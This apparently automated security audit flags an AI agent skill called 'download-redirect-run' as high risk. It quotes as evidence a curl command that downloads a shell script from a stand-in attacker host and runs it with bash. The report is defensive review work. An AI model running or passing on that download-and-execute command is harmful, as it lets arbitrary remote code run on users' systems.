download-redirect-run

Fail

Audited by Gen Agent Trust Hub on Apr 20, 2026

Risk Level: HIGH
REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, EXTERNAL_DOWNLOADS
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill performs an insecure download-and-execute sequence by fetching a remote script and running it directly in the shell.
  • Evidence: curl -sSL https://evil.example.org/p.sh > /tmp/p.sh followed by bash /tmp/p.sh.
  • [COMMAND_EXECUTION]: The skill uses the bash interpreter to execute external code, which bypasses safety boundaries and allows for arbitrary system commands.
  • [EXTERNAL_DOWNLOADS]: The skill retrieves executable content from https://evil.example.org/p.sh, which is an untrusted external source.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: HIGH
Analyzed: Apr 20, 2026, 06:16 AM